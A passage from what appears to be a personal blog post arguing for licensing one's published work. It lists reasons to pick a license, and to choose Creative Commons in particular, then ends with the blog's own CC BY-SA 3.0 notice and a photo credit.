  • because choosing one license doesn’t mean that you can’t change it in the future (if you are the sole copyright holder of the material or if all copyright holders agree, the work can be relicensed – also the same material can be licensed under different licenses at the same time)
  • even if you don’t specify a license, there are implied rights (given by the fact that you made your work public) and a license can help clarify the issues

Why use creative commons?

  • because it is a well understood license and the compatibility between it and other licenses has been largely explored
  • because there is an organization behind it, which can help you with legal matters
  • because it has variants to cover almost all possible cases (do you want attribution? do you want to permit derivative works? etc)
  • because it is much more likely to hold up in a court of law, should it ever be challenged, than a home-grown license
  • because there is a whole lot of material out there already under a CC license, which can be reused by you (for example the pictures attached to my blogposts are all under a CC license)

PS. All work on this blog – unless explicitly specified otherwise - is licensed under a Creative Commons Attribution-Share Alike 3.0 Unported License.

Picture taken from Jayel Aheram's photostream with permission.